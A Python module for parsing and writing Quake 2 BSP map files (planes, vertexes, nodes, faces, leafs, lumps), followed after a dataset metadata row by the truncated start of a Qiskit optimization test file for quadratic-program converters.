- id Software
- https://github.com/id-Software/Quake-2
Quake 2 BSP File Format
- Max McGuire
- http://www.flipcode.com/archives/Quake_2_BSP_File_Format.shtml
"""
import io
import struct
__all__ = ['BadBspFile', 'is_bspfile', 'Bsp']
class BadBspFile(Exception):
pass
def _check_bspfile(fp):
fp.seek(0)
data = fp.read(struct.calcsize('<4si'))
    identity, version = struct.unpack('<4si', data)
    return identity == b'IBSP' and version == 38
def is_bspfile(filename):
"""Quickly see if a file is a bsp file by checking the magic number.
    The filename argument may be a filename or a file-like object.
"""
result = False
try:
if hasattr(filename, 'read'):
return _check_bspfile(fp=filename)
else:
with open(filename, 'rb') as fp:
return _check_bspfile(fp)
except:
pass
return result
class ClassSequence:
"""Class for reading a sequence of data structures"""
Class = None
@classmethod
def write(cls, file, structures):
for structure in structures:
cls.Class.write(file, structure)
@classmethod
def read(cls, file):
return [cls.Class(*c) for c in struct.iter_unpack(cls.Class.format, file.read())]
class Entities:
"""Class for representing the entities lump"""
@classmethod
def write(cls, file, entities):
entities_data = entities.encode('cp437')
file.write(entities_data)
@classmethod
def read(cls, file):
entities_data = file.read()
return entities_data.decode('cp437')
class Plane:
"""Class for representing a bsp plane
Attributes:
normal: The normal vector to the plane.
distance: The distance from world (0, 0, 0) to a point on the plane
type: Planes are classified as follows:
0: Axial plane aligned to the x-axis.
1: Axial plane aligned to the y-axis.
2: Axial plane aligned to the z-axis.
3: Non-axial plane roughly aligned to the x-axis.
4: Non-axial plane roughly aligned to the y-axis.
5: Non-axial plane roughly aligned to the z-axis.
"""
format = '<4fi'
size = struct.calcsize(format)
__slots__ = (
'normal',
'distance',
'type'
)
def __init__(self,
normal_x,
normal_y,
normal_z,
distance,
type):
self.normal = normal_x, normal_y, normal_z
self.distance = distance
self.type = type
@classmethod
def write(cls, file, plane):
plane_data = struct.pack(cls.format,
*plane.normal,
plane.distance,
plane.type)
file.write(plane_data)
@classmethod
def read(cls, file):
plane_data = file.read(cls.size)
plane_struct = struct.unpack(cls.format, plane_data)
return Plane(*plane_struct)
class Planes(ClassSequence):
Class = Plane
class Vertex:
"""Class for representing a vertex
A Vertex is an XYZ triple.
Attributes:
x: The x-coordinate
y: The y-coordinate
z: The z-coordinate
"""
format = '<3f'
size = struct.calcsize(format)
__slots__ = (
'x',
'y',
'z'
)
def __init__(self, x, y, z):
self.x = x
self.y = y
self.z = z
def __getitem__(self, item):
if type(item) is int:
return [self.x, self.y, self.z][item]
elif type(item) is slice:
start = item.start or 0
stop = item.stop or 3
return [self.x, self.y, self.z][start:stop]
@classmethod
def write(cls, file, vertex):
vertex_data = struct.pack(cls.format,
vertex.x,
vertex.y,
vertex.z)
file.write(vertex_data)
@classmethod
def read(cls, file):
vertex_data = file.read(cls.size)
vertex_struct = struct.unpack(cls.format, vertex_data)
return Vertex(*vertex_struct)
class Vertexes(ClassSequence):
Class = Vertex
class Visibilities:
@classmethod
def write(cls, file, structures):
file.write(structures)
@classmethod
def read(cls, file):
return file.read()
class Node:
"""Class for representing a node
A Node is a data structure used to compose a bsp tree data structure. A
child may be a Node or a Leaf.
Attributes:
plane_number: The number of the plane that partitions the node.
children: A two-tuple of the two sub-spaces formed by the partitioning
plane.
Note: Child 0 is the front sub-space, and 1 is the back sub-space.
Note: If bit 15 is set, the child is a leaf.
bounding_box_min: The minimum coordinate of the bounding box containing
this node and all of its children.
bounding_box_max: The maximum coordinate of the bounding box containing
this node and all of its children.
        first_face: The number of the first face in Bsp.faces.
        number_of_faces: The number of faces contained in the node. These
            are stored in consecutive order in Bsp.faces starting at
            Node.first_face.
"""
format = '<3i6h2H'
size = struct.calcsize(format)
__slots__ = (
'plane_number',
'children',
'bounding_box_min',
'bounding_box_max',
'first_face',
'number_of_faces'
)
def __init__(self,
plane_number,
child_front,
child_back,
bounding_box_min_x,
bounding_box_min_y,
bounding_box_min_z,
bounding_box_max_x,
bounding_box_max_y,
bounding_box_max_z,
first_face,
number_of_faces):
self.plane_number = plane_number
self.children = child_front, child_back
self.bounding_box_min = bounding_box_min_x, bounding_box_min_y, bounding_box_min_z
self.bounding_box_max = bounding_box_max_x, bounding_box_max_y, bounding_box_max_z
self.first_face = first_face
self.number_of_faces = number_of_faces
@classmethod
def write(cls, file, node):
node_data = struct.pack(cls.format,
node.plane_number,
*node.children,
*node.bounding_box_min,
*node.bounding_box_max,
node.first_face,
node.number_of_faces)
file.write(node_data)
@classmethod
def read(cls, file):
node_data = file.read(cls.size)
node_struct = struct.unpack(cls.format, node_data)
return Node(*node_struct)
class Nodes(ClassSequence):
Class = Node
class SurfaceFlag:
LIGHT = 0x1
SLICK = 0x2
SKY = 0x4
WARP = 0x8
TRANS33 = 0x10
TRANS66 = 0x20
FLOWING = 0x40
NODRAW = 0x80
class TextureInfo:
"""Class for representing a texture info
Attributes:
s: The s vector in texture space represented as an XYZ three-tuple.
s_offset: Horizontal offset in texture space.
t: The t vector in texture space represented as an XYZ three-tuple.
t_offset: Vertical offset in texture space.
flags: A bitfield of surface behaviors.
value:
texture_name: The path of the texture.
next_texture_info: For animated textures. Sequence will be terminated
with a value of -1
"""
format = '<8f2i32si'
size = struct.calcsize(format)
__slots__ = (
's',
's_offset',
't',
't_offset',
'flags',
'value',
'texture_name',
'next_texture_info'
)
def __init__(self,
s_x,
s_y,
s_z,
s_offset,
t_x,
t_y,
t_z,
t_offset,
flags,
value,
texture_name,
next_texture_info):
self.s = s_x, s_y, s_z
self.s_offset = s_offset
self.t = t_x, t_y, t_z
self.t_offset = t_offset
self.flags = flags
self.value = value
if type(texture_name) == bytes:
self.texture_name = texture_name.split(b'\00')[0].decode('ascii')
else:
self.texture_name = texture_name
self.next_texture_info = next_texture_info
@classmethod
def write(cls, file, texture_info):
texture_info_data = struct.pack(cls.format,
*texture_info.s,
texture_info.s_offset,
*texture_info.t,
texture_info.t_offset,
texture_info.flags,
texture_info.value,
texture_info.texture_name.encode('ascii'),
texture_info.next_texture_info)
file.write(texture_info_data)
@classmethod
def read(cls, file):
texture_info_data = file.read(cls.size)
texture_info_struct = struct.unpack(cls.format, texture_info_data)
return TextureInfo(*texture_info_struct)
class TextureInfos(ClassSequence):
Class = TextureInfo
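# Illustrative sketch (not part of the original module): a TextureInfo's s/t vectors and
# offsets map world-space vertexes to texel coordinates. The helper below is an assumed
# example of how a caller might use them; it is not referenced elsewhere in this file.
def _example_texture_coordinates(vertex, texture_info):
    """Return the (u, v) texel coordinates of a vertex for a given TextureInfo."""
    u = vertex.x * texture_info.s[0] + vertex.y * texture_info.s[1] + \
        vertex.z * texture_info.s[2] + texture_info.s_offset
    v = vertex.x * texture_info.t[0] + vertex.y * texture_info.t[1] + \
        vertex.z * texture_info.t[2] + texture_info.t_offset
    return u, v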
class Face:
"""Class for representing a face
Attributes:
plane_number: The plane in which the face lies.
side: Which side of the plane the face lies. 0 is the front, 1 is the
back.
first_edge: The number of the first edge in Bsp.surf_edges.
number_of_edges: The number of edges contained within the face. These
are stored in consecutive order in Bsp.surf_edges starting at
Face.first_edge.
texture_info: The number of the texture info for this face.
styles: A four-tuple of lightmap styles.
light_offset: The offset into the lighting data.
"""
format = '<Hhi2h4Bi'
size = struct.calcsize(format)
__slots__ = (
'plane_number',
'side',
'first_edge',
'number_of_edges',
'texture_info',
'styles',
'light_offset'
)
def __init__(self,
plane_number,
side,
first_edge,
number_of_edges,
texture_info,
style_0,
style_1,
style_2,
style_3,
light_offset):
self.plane_number = plane_number
self.side = side
self.first_edge = first_edge
self.number_of_edges = number_of_edges
self.texture_info = texture_info
self.styles = style_0, style_1, style_2, style_3
self.light_offset = light_offset
@classmethod
def write(cls, file, plane):
face_data = struct.pack(cls.format,
plane.plane_number,
plane.side,
plane.first_edge,
plane.number_of_edges,
plane.texture_info,
*plane.styles,
plane.light_offset)
file.write(face_data)
@classmethod
def read(cls, file):
face_data = file.read(cls.size)
face_struct = struct.unpack(cls.format, face_data)
return Face(*face_struct)
class Faces(ClassSequence):
Class = Face
class Lighting:
@classmethod
def write(cls, file, lighting):
file.write(lighting)
@classmethod
def read(cls, file):
return file.read()
class Contents:
SOLID = 1
WINDOW = 2
AUX = 4
LAVA = 8
SLIME = 16
WATER = 32
MIST = 64
LAST_VISIBLE = 64
AREAPORTAL = 0x8000
PLAYERCLIP = 0x10000
MONSTERCLIP = 0x20000
CURRENT_0 = 0x40000
CURRENT_90 = 0x80000
CURRENT_180 = 0x100000
CURRENT_270 = 0x200000
CURRENT_UP = 0x400000
CURRENT_DOWN = 0x800000
ORIGIN = 0x1000000
MONSTER = 0x2000000
DEADMONSTER = 0x4000000
DETAIL = 0x8000000
TRANSLUCENT = 0x10000000
LADDER = 0x20000000
class Leaf:
"""Class for representing a leaf
Attributes:
contents: The content of the leaf. Affect the player's view.
cluster: The cluster containing this leaf. -1 for no visibility info.
area: The area containing this leaf.
bounding_box_min: The minimum coordinate of the bounding box containing
this node.
bounding_box_max: The maximum coordinate of the bounding box containing
this node.
        first_leaf_face: The number of the first entry in Bsp.leaf_faces.
        number_of_leaf_faces: The number of faces contained within the leaf.
            These are stored in consecutive order in Bsp.leaf_faces at
            Leaf.first_leaf_face.
        first_leaf_brush: The number of the first entry in Bsp.leaf_brushes.
        number_of_leaf_brushes: The number of brushes contained within the
            leaf. These are stored in consecutive order in Bsp.leaf_brushes at
            Leaf.first_leaf_brush.
"""
format = '<i8h4H'
size = struct.calcsize(format)
__slots__ = (
'contents',
'cluster',
'area',
'bounding_box_min',
'bounding_box_max',
'first_leaf_face',
'number_of_leaf_faces',
'first_leaf_brush',
'number_of_leaf_brushes'
)
def __init__(self,
contents,
cluster,
area,
bounding_box_min_x,
bounding_box_min_y,
bounding_box_min_z,
bounding_box_max_x,
bounding_box_max_y,
bounding_box_max_z,
first_leaf_face,
number_of_leaf_faces,
first_leaf_brush,
number_of_leaf_brushes):
self.contents = contents
self.cluster = cluster
self.area = area
self.bounding_box_min = bounding_box_min_x, bounding_box_min_y, bounding_box_min_z
self.bounding_box_max = bounding_box_max_x, bounding_box_max_y, bounding_box_max_z
self.first_leaf_face = first_leaf_face
self.number_of_leaf_faces = number_of_leaf_faces
self.first_leaf_brush = first_leaf_brush
self.number_of_leaf_brushes = number_of_leaf_brushes
@classmethod
def write(cls, file, leaf):
leaf_data = struct.pack(cls.format,
leaf.contents,
leaf.cluster,
leaf.area,
*leaf.bounding_box_min,
*leaf.bounding_box_max,
leaf.first_leaf_face,
leaf.number_of_leaf_faces,
leaf.first_leaf_brush,
leaf.number_of_leaf_brushes)
file.write(leaf_data)
@classmethod
def read(cls, file):
leaf_data = file.read(cls.size)
leaf_struct = struct.unpack(cls.format, leaf_data)
return Leaf(*leaf_struct)
class Leafs(ClassSequence):
Class = Leaf
class LeafFaces:
@classmethod
def write(cls, file, leaf_faces):
leaf_faces_format = '<{}H'.format(len(leaf_faces))
leaf_faces_data = struct.pack(leaf_faces_format, *leaf_faces)
file.write(leaf_faces_data)
@classmethod
def read(cls, file):
return [lf[0] for lf in struct.iter_unpack('<H', file.read())]
class LeafBrushes:
@classmethod
def write(cls, file, leaf_brushes):
leaf_brushes_format = '<{}H'.format(len(leaf_brushes))
leaf_brushes_data = struct.pack(leaf_brushes_format, *leaf_brushes)
file.write(leaf_brushes_data)
@classmethod
def read(cls, file):
return [lb[0] for lb in struct.iter_unpack('<H', file.read())]
class Edge:
"""Class for representing a edge
Attributes:
vertexes: A two-tuple of vertexes that form the edge. Vertex 0 is the
start vertex, and 1 is the end vertex.
"""
format = '<2H'
size = struct.calcsize(format)
__slots__ = (
'vertexes'
)
def __init__(self, vertex_0, vertex_1):
self.vertexes = vertex_0, vertex_1
def __getitem__(self, item):
if item > 1:
raise IndexError('list index of out of range')
return self.vertexes[item]
@classmethod
def write(cls, file, edge):
edge_data = struct.pack(cls.format,
*edge.vertexes)
file.write(edge_data)
@classmethod
def read(cls, file):
edge_data = file.read(cls.size)
edge_struct = struct.unpack(cls.format, edge_data)
return Edge(*edge_struct)
class Edges(ClassSequence):
Class = Edge
class SurfEdges:
    @classmethod
    def write(cls, file, surf_edges):
        # Surface edge entries are signed 32-bit ints; a negative value means the
        # referenced edge is walked in reverse (end vertex first).
        surf_edges_format = '<{}i'.format(len(surf_edges))
        surf_edges_data = struct.pack(surf_edges_format, *surf_edges)
        file.write(surf_edges_data)
    @classmethod
    def read(cls, file):
        return [se[0] for se in struct.iter_unpack('<i', file.read())]
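# Illustrative sketch (assumption, not part of the original module): Face.first_edge and
# Face.number_of_edges index into Bsp.surf_edges, whose entries are signed; a negative
# entry means the edge's vertexes are used in reverse order. This helper is an example
# of reconstructing a face's vertex loop and is not referenced elsewhere in this file.
def _example_face_vertexes(bsp, face):
    """Yield the vertex numbers around a face, in winding order."""
    for i in range(face.first_edge, face.first_edge + face.number_of_edges):
        surf_edge = bsp.surf_edges[i]
        edge = bsp.edges[abs(surf_edge)]
        yield edge.vertexes[0] if surf_edge >= 0 else edge.vertexes[1]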
class Model:
"""Class for representing a model
Attributes:
bounding_box_min: The minimum coordinate of the bounding box containing
the model.
bounding_box_max: The maximum coordinate of the bounding box containing
the model.
origin: The origin of the model.
        head_node: The number of the root node of this model's bsp tree.
        first_face: The number of the first face in Bsp.faces.
        number_of_faces: The number of faces contained in the model. These
            are stored in consecutive order in Bsp.faces starting at
            Model.first_face.
"""
format = '<9f3i'
size = struct.calcsize(format)
__slots__ = (
'bounding_box_min',
'bounding_box_max',
'origin',
'head_node',
'first_face',
'number_of_faces'
)
def __init__(self,
bounding_box_min_x,
bounding_box_min_y,
bounding_box_min_z,
bounding_box_max_x,
bounding_box_max_y,
bounding_box_max_z,
origin_x,
origin_y,
origin_z,
head_node,
first_face,
number_of_faces):
self.bounding_box_min = bounding_box_min_x, bounding_box_min_y, bounding_box_min_z
self.bounding_box_max = bounding_box_max_x, bounding_box_max_y, bounding_box_max_z
self.origin = origin_x, origin_y, origin_z
self.head_node = head_node
self.first_face = first_face
self.number_of_faces = number_of_faces
@classmethod
def write(cls, file, model):
model_data = struct.pack(cls.format,
*model.bounding_box_min,
*model.bounding_box_max,
*model.origin,
model.head_node,
model.first_face,
model.number_of_faces)
file.write(model_data)
@classmethod
def read(cls, file):
model_data = file.read(cls.size)
model_struct = struct.unpack(cls.format, model_data)
return Model(*model_struct)
class Models(ClassSequence):
Class = Model
class Brush:
format = '<3i'
size = struct.calcsize(format)
__slots__ = (
'first_side',
'number_of_sides',
'contents'
)
def __init__(self,
first_side,
number_of_sides,
contents):
self.first_side = first_side
self.number_of_sides = number_of_sides
self.contents = contents
@classmethod
def write(cls, file, brush):
brush_data = struct.pack(cls.format,
brush.first_side,
brush.number_of_sides,
brush.contents)
file.write(brush_data)
@classmethod
def read(cls, file):
brush_data = file.read(cls.size)
brush_struct = struct.unpack(cls.format, brush_data)
return Brush(*brush_struct)
class Brushes(ClassSequence):
Class = Brush
class BrushSide:
format = '<Hh'
size = struct.calcsize(format)
__slots__ = (
'plane_number',
'texture_info'
)
def __init__(self,
plane_number,
texture_info):
self.plane_number = plane_number
self.texture_info = texture_info
@classmethod
def write(cls, file, brush_side):
brush_side_data = struct.pack(cls.format,
brush_side.plane_number,
brush_side.texture_info)
file.write(brush_side_data)
@classmethod
def read(cls, file):
brush_side_data = file.read(cls.size)
brush_side_struct = struct.unpack(cls.format, brush_side_data)
return BrushSide(*brush_side_struct)
class BrushSides(ClassSequence):
Class = BrushSide
class Pop:
@classmethod
def write(cls, file, structures):
file.write(structures)
@classmethod
def read(cls, file):
return file.read()
class Area:
format = '<2i'
size = struct.calcsize(format)
__slots__ = (
'number_of_area_portals',
'first_area_portal'
)
def __init__(self,
number_of_area_portals,
first_area_portal):
self.number_of_area_portals = number_of_area_portals
self.first_area_portal = first_area_portal
@classmethod
def write(cls, file, area):
area_data = struct.pack(cls.format,
area.number_of_area_portals,
area.first_area_portal)
file.write(area_data)
@classmethod
def read(cls, file):
area_data = file.read(cls.size)
area_struct = struct.unpack(cls.format, area_data)
return Area(*area_struct)
class Areas(ClassSequence):
Class = Area
class AreaPortal:
format = '<2i'
size = struct.calcsize(format)
__slots__ = (
'portal_number',
'other_area'
)
def __init__(self,
portal_number,
other_area):
self.portal_number = portal_number
self.other_area = other_area
@classmethod
def write(cls, file, area):
area_data = struct.pack(cls.format,
area.portal_number,
area.other_area)
file.write(area_data)
@classmethod
def read(cls, file):
area_data = file.read(cls.size)
area_struct = struct.unpack(cls.format, area_data)
return AreaPortal(*area_struct)
class AreaPortals(ClassSequence):
Class = AreaPortal
class Lump:
"""Class for representing a lump.
A lump is a section of data that typically contains a sequence of data
structures.
Attributes:
offset: The offset of the lump entry from the start of the file.
length: The length of the lump entry.
"""
format = '<2i'
size = struct.calcsize(format)
__slots__ = (
'offset',
'length'
)
def __init__(self, offset, length):
self.offset = offset
self.length = length
@classmethod
def write(cls, file, lump):
lump_data = struct.pack(cls.format,
lump.offset,
lump.length)
file.write(lump_data)
@classmethod
def read(cls, file):
lump_data = file.read(cls.size)
lump_struct = struct.unpack(cls.format, lump_data)
return Lump(*lump_struct)
class Header:
"""Class for representing a Bsp file header
Attributes:
identity: The file identity. Should be b'IBSP'.
version: The file version. Should be 38.
lumps: A sequence of nineteen Lumps
"""
format = '<4si{}'.format(Lump.format[1:] * 19)
size = struct.calcsize(format)
order = [
Entities,
Planes,
Vertexes,
Visibilities,
Nodes,
TextureInfos,
Faces,
Lighting,
Leafs,
LeafFaces,
LeafBrushes,
Edges,
SurfEdges,
Models,
Brushes,
BrushSides,
Pop,
Areas,
AreaPortals
]
__slots__ = (
'identity',
'version',
'lumps'
)
def __init__(self,
identity,
version,
lumps):
self.identity = identity
self.version = version
self.lumps = lumps
@classmethod
def write(cls, file, header):
lump_values = []
for lump in header.lumps:
lump_values += lump.offset, lump.length
header_data = struct.pack(cls.format,
header.identity,
header.version,
*lump_values)
file.write(header_data)
@classmethod
def read(cls, file):
data = file.read(cls.size)
lumps_start = struct.calcsize('<4si')
header_data = data[:lumps_start]
header_struct = struct.unpack('<4si', header_data)
ident = header_struct[0]
version = header_struct[1]
lumps_data = data[lumps_start:]
lumps = [Lump(*l) for l in struct.iter_unpack(Lump.format, lumps_data)]
return Header(ident, version, lumps)
class Bsp:
"""Class for working with Bsp files
Example:
b = Bsp.open(file)
Attributes:
identity: Identity of the Bsp file. Should be b'IBSP'
version: Version of the Bsp file. Should be 38
entities: A string containing the entity definitions.
planes: A list of Plane objects used by the bsp tree data structure.
vertexes: A list of Vertex objects.
visibilities: A list of integers representing visibility data.
nodes: A list of Node objects used by the bsp tree data structure.
texture_infos: A list of TextureInfo objects.
faces: A list of Face objects.
lighting: A list of ints representing lighting data.
leafs: A list of Leaf objects used by the bsp tree data structure.
leaf_faces: A list of ints representing a consecutive list of faces
used by the Leaf objects.
leaf_brushes: A list of ints representing a consecutive list of edges
used by the Leaf objects.
edges: A list of Edge objects.
surf_edges: A list of ints representing a consecutive list of edges
used by the Face objects.
models: A list of Model objects.
brushes: A list of Brush objects.
brush_sides: A list of BrushSide objects.
pop: Proof of purchase? Always 256 bytes of null data if present.
areas: A list of Area objects.
area_portals: A list of AreaPortal objects.
"""
def __init__(self):
self.fp = None
self.mode = None
self._did_modify = False
self.identity = b'IBSP'
self.version = 38
self.entities = ""
self.planes = []
self.vertexes = []
self.visibilities = []
self.nodes = []
self.texture_infos = []
self.faces = []
self.lighting = b''
self.leafs = []
self.leaf_faces = []
self.leaf_brushes = []
self.edges = []
self.surf_edges = []
self.models = []
self.brushes = []
self.brush_sides = []
self.pop = []
self.areas = []
self.area_portals = []
Lump = Lump
Header = Header
Entities = Entities
Planes = Planes
Vertexes = Vertexes
    Visibilities = Visibilities
Nodes = Nodes
TextureInfos = TextureInfos
Faces = Faces
Lighting = Lighting
Leafs = Leafs
LeafFaces = LeafFaces
LeafBrushes = LeafBrushes
Edges = Edges
SurfEdges = SurfEdges
Models = Models
Brushes = Brushes
BrushSides = BrushSides
Pop = Pop
Areas = Areas
AreaPortals = AreaPortals
@classmethod
def open(cls, file, mode='r'):
"""Returns a Bsp object
Args:
file: Either the path to the file, a file-like object, or bytes.
mode: An optional string that indicates which mode to open the file
Returns:
An Bsp object constructed from the information read from the
file-like object.
Raises:
ValueError: If an invalid file mode is given.
RuntimeError: If the file argument is not a file-like object.
"""
if mode not in ('r', 'w', 'a'):
raise ValueError("invalid mode: '%s'" % mode)
filemode = {'r': 'rb', 'w': 'w+b', 'a': 'r+b'}[mode]
if isinstance(file, str):
file = io.open(file, filemode)
elif isinstance(file, bytes):
file = io.BytesIO(file)
elif not hasattr(file, 'read'):
raise RuntimeError(
"Bsp.open() requires 'file' to be a path, a file-like object, "
"or bytes")
# Read
if mode == 'r':
return cls._read_file(file, mode)
# Write
elif mode == 'w':
bsp = cls()
bsp.fp = file
bsp.mode = 'w'
bsp._did_modify = True
return bsp
# Append
else:
bsp = cls._read_file(file, mode)
bsp._did_modify = True
return bsp
@classmethod
def _read_file(cls, file, mode):
def _read_lump(Class):
lump = header.lumps[header.order.index(Class)]
file.seek(lump.offset)
return Class.read(io.BytesIO(file.read(lump.length)))
bsp = cls()
bsp.mode = mode
bsp.fp = file
# Header
header = cls.Header.read(file)
bsp.identity = header.identity
bsp.version = header.version
bsp.entities = _read_lump(cls.Entities)
bsp.planes = _read_lump(cls.Planes)
bsp.vertexes = _read_lump(cls.Vertexes)
bsp.visibilities = _read_lump(cls.Visibilities)
bsp.nodes = _read_lump(cls.Nodes)
bsp.texture_infos = _read_lump(cls.TextureInfos)
bsp.faces = _read_lump(cls.Faces)
bsp.lighting = _read_lump(cls.Lighting)
bsp.leafs = _read_lump(cls.Leafs)
bsp.leaf_faces = _read_lump(cls.LeafFaces)
bsp.leaf_brushes = _read_lump(cls.LeafBrushes)
bsp.edges = _read_lump(cls.Edges)
bsp.surf_edges = _read_lump(cls.SurfEdges)
bsp.models = _read_lump(cls.Models)
bsp.brushes = _read_lump(cls.Brushes)
bsp.brush_sides = _read_lump(cls.BrushSides)
bsp.pop = _read_lump(cls.Pop)
bsp.areas = _read_lump(cls.Areas)
bsp.area_portals = _read_lump(cls.AreaPortals)
return bsp
@classmethod
def _write_file(cls, file, bsp):
def _write_lump(Class, data):
offset = file.tell()
Class.write(file, data)
size = file.tell() - offset
return cls.Lump(offset, size)
lumps = [cls.Lump(0, 0) for _ in range(19)]
header = cls.Header(bsp.identity, bsp.version, lumps)
lump_index = header.order.index
# Stub out header info
cls.Header.write(file, header)
lumps[lump_index(cls.Entities)] = _write_lump(cls.Entities, bsp.entities)
lumps[lump_index(cls.Planes)] = _write_lump(cls.Planes, bsp.planes)
lumps[lump_index(cls.Vertexes)] = _write_lump(cls.Vertexes, bsp.vertexes)
lumps[lump_index(cls.Visibilities)] = _write_lump(cls.Visibilities, bsp.visibilities)
lumps[lump_index(cls.Nodes)] = _write_lump(cls.Nodes, bsp.nodes)
lumps[lump_index(cls.TextureInfos)] = _write_lump(cls.TextureInfos, bsp.texture_infos)
lumps[lump_index(cls.Faces)] = _write_lump(cls.Faces, bsp.faces)
lumps[lump_index(cls.Lighting)] = _write_lump(cls.Lighting, bsp.lighting)
lumps[lump_index(cls.Leafs)] = _write_lump(cls.Leafs, bsp.leafs)
lumps[lump_index(cls.LeafFaces)] = _write_lump(cls.LeafFaces, bsp.leaf_faces)
lumps[lump_index(cls.LeafBrushes)] = _write_lump(cls.LeafBrushes, bsp.leaf_brushes)
lumps[lump_index(cls.Edges)] = _write_lump(cls.Edges, bsp.edges)
lumps[lump_index(cls.SurfEdges)] = _write_lump(cls.SurfEdges, bsp.surf_edges)
lumps[lump_index(cls.Models)] = _write_lump(cls.Models, bsp.models)
lumps[lump_index(cls.Brushes)] = _write_lump(cls.Brushes, bsp.brushes)
lumps[lump_index(cls.BrushSides)] = _write_lump(cls.BrushSides, bsp.brush_sides)
lumps[lump_index(cls.Pop)] = _write_lump(cls.Pop, bsp.pop)
lumps[lump_index(cls.Areas)] = _write_lump(cls.Areas, bsp.areas)
lumps[lump_index(cls.AreaPortals)] = _write_lump(cls.AreaPortals, bsp.area_portals)
end_of_file = file.tell()
# Finalize header
file.seek(0)
cls.Header.write(file, header)
file.seek(end_of_file)
def save(self, file):
"""Writes Bsp data to file
Args:
file: Either the path to the file, or a file-like object, or bytes.
Raises:
RuntimeError: If the file argument is not a file-like object.
"""
should_close = False
if isinstance(file, str):
file = io.open(file, 'r+b')
should_close = True
elif isinstance(file, bytes):
file = io.BytesIO(file)
should_close = True
elif not hasattr(file, 'write'):
raise RuntimeError(
"Bsp.open() requires 'file' to be a path, a file-like object, "
"or bytes")
self._write_file(file, self)
if should_close:
file.close()
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def close(self):
"""Closes the file pointer if possible. If mode is 'w' or 'a', the file
will be written to.
"""
if self.fp:
if self.mode in ('w', 'a') and self._did_modify:
self.fp.seek(0)
self._write_file(self.fp, self)
self.fp.truncate()
file_object = self.fp
self.fp = None
file_object.close()
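# Illustrative usage sketch (assumes a Quake 2 .bsp file is available at the given path):
#
#     with Bsp.open('maps/base1.bsp') as bsp_file:
#         print(bsp_file.identity, bsp_file.version)
#         print('vertexes:', len(bsp_file.vertexes))
#         print('faces:', len(bsp_file.faces))
#         for model in bsp_file.models:
#             print(model.origin, model.number_of_faces)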
| [
"[email protected]"
] | |
55a4e8e8c4aa91e9545e39a617b5c10879c37d07 | 33eb4fd807c1a641f52f7124ec7b256ce07612f1 | /test/optimization/test_converters.py | ceb47854904a2313fb0dfe0c2ea5d0555a45b620 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | levbishop/qiskit-aqua | 9ee27da1533cbb9746fe5ff5255533bd9742faa5 | 50e4d935241452bb76296cea6144a9fc452c5e2c | refs/heads/master | 2022-12-04T01:48:18.477406 | 2020-08-11T19:25:03 | 2020-08-11T19:25:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 30,877 | py | # -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Test Converters """
import logging
import unittest
from test.optimization.optimization_test_case import QiskitOptimizationTestCase
import numpy as np
from docplex.mp.model import Model
from qiskit.aqua.algorithms import NumPyMinimumEigensolver
from qiskit.aqua.operators import Z, I
from qiskit.optimization import QuadraticProgram, QiskitOptimizationError
from qiskit.optimization.algorithms import MinimumEigenOptimizer, CplexOptimizer, ADMMOptimizer
from qiskit.optimization.algorithms import OptimizationResult
from qiskit.optimization.algorithms.admm_optimizer import ADMMParameters
from qiskit.optimization.algorithms.optimization_algorithm import OptimizationResultStatus
from qiskit.optimization.converters import (InequalityToEquality, IntegerToBinary,
LinearEqualityToPenalty, QuadraticProgramToIsing,
IsingToQuadraticProgram)
from qiskit.optimization.problems import Constraint, Variable
logger = logging.getLogger(__name__)
QUBIT_OP_MAXIMIZE_SAMPLE = (
-199999.5 * (I ^ I ^ I ^ Z)
+ -399999.5 * (I ^ I ^ Z ^ I)
+ -599999.5 * (I ^ Z ^ I ^ I)
+ -799999.5 * (Z ^ I ^ I ^ I)
+ 100000 * (I ^ I ^ Z ^ Z)
+ 150000 * (I ^ Z ^ I ^ Z)
+ 300000 * (I ^ Z ^ Z ^ I)
+ 200000 * (Z ^ I ^ I ^ Z)
+ 400000 * (Z ^ I ^ Z ^ I)
+ 600000 * (Z ^ Z ^ I ^ I)
)
OFFSET_MAXIMIZE_SAMPLE = 1149998
class TestConverters(QiskitOptimizationTestCase):
"""Test Converters"""
def test_empty_problem(self):
""" Test empty problem """
op = QuadraticProgram()
conv = InequalityToEquality()
op = conv.convert(op)
conv = IntegerToBinary()
op = conv.convert(op)
conv = LinearEqualityToPenalty()
op = conv.convert(op)
_, shift = op.to_ising()
self.assertEqual(shift, 0.0)
def test_valid_variable_type(self):
"""Validate the types of the variables for QuadraticProgram.to_ising."""
# Integer variable
with self.assertRaises(QiskitOptimizationError):
op = QuadraticProgram()
op.integer_var(0, 10, "int_var")
_ = op.to_ising()
# Continuous variable
with self.assertRaises(QiskitOptimizationError):
op = QuadraticProgram()
op.continuous_var(0, 10, "continuous_var")
_ = op.to_ising()
def test_inequality_binary(self):
""" Test InequalityToEqualityConverter with binary variables """
op = QuadraticProgram()
for i in range(3):
op.binary_var(name='x{}'.format(i))
# Linear constraints
linear_constraint = {'x0': 1, 'x1': 1}
op.linear_constraint(linear_constraint, Constraint.Sense.EQ, 1, 'x0x1')
linear_constraint = {'x1': 1, 'x2': -1}
op.linear_constraint(linear_constraint, Constraint.Sense.LE, 2, 'x1x2')
linear_constraint = {'x0': 1, 'x2': 3}
op.linear_constraint(linear_constraint, Constraint.Sense.GE, 2, 'x0x2')
# Quadratic constraints
quadratic = {('x0', 'x1'): 1, ('x1', 'x2'): 2}
op.quadratic_constraint({}, quadratic, Constraint.Sense.LE, 3, 'x0x1_x1x2LE')
quadratic = {('x0', 'x1'): 3, ('x1', 'x2'): 4}
op.quadratic_constraint({}, quadratic, Constraint.Sense.GE, 3, 'x0x1_x1x2GE')
# Convert inequality constraints into equality constraints
conv = InequalityToEquality()
op2 = conv.convert(op)
self.assertListEqual([v.name for v in op2.variables],
['x0', 'x1', 'x2', 'x1x2@int_slack', 'x0x2@int_slack',
'x0x1_x1x2LE@int_slack', 'x0x1_x1x2GE@int_slack'])
# Check names and objective senses
self.assertEqual(op.name, op2.name)
self.assertEqual(op.objective.sense, op2.objective.sense)
# For linear constraints
lst = [
